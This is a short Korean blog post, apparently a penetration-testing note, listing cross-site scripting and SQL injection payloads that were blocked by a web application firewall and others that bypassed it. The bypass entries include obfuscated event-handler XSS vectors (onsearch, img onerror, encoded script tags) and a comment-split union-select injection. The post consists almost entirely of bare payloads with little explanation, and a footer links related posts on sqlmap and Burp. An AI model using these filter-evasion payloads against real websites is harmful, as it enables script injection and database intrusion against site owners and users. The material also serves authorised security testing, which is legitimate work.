XSS_웹방화벽 우회.pdfXSS 웹방화벽 우회
방화벽에 막힌 것들
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
<details ontoggle=alert(1)>
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[JS-F**k
Payload]">
<div contextmenu="xss">Right-Click Here<menu id="xss"
onshow="prom%25%32%33%25%32%36x70;t(1)">
<body style="height:1000px" onwheel="alert(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
<svg+onload=+"aler%25%37%34(1)"
<a href="j[785 bytes of (
	)]avascript:alert(1);">XSS</a>
¼script¾alert(¢xss¢)¼/script¾
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
¼script¾aler\u0074(1)¼/script¾
방화벽 우회 가능한 것들
<input type="search" onsearch="aler\u0074(1)">
<img/src="x"/onerror="[JS-F**K Payload]">
<input type="text" styl"width:120px;ime-mode:incative" value="test" onfocus=window.location="http://www.naver.com">
SQL Injection 웹방화벽 우회
방화벽에 막힌것들
/?id=1/*union*/union/*select*/select+1,2,3/*1/*uni X on*/union/*sel X ect*/select+1,2,3/*
1;select+1,2,3+from+users+where+id=1--
방화벽 우회한 것들
/?id=1+union+select+1,2,3/*
'프로젝트 관련 조사 > 모의 해킹' 카테고리의 다른 글
| Testing SQLMap on SOAP (SQLMAP에서 SOAP 형식 스캔하기) (0) | 2016.10.18 |
|---|---|
| 신뢰할수 없는 SSL경고 사이트 프록시 적용 - Burp 인증서 등록하기 (0) | 2016.10.18 |
| [sqlmap] sqlmap 사용법 (0) | 2016.08.24 |
| 웹 취약점 진단을 위한 피들러 사용법 (0) | 2016.07.24 |
| 취약점 점검 도구 (0) | 2016.07.23 |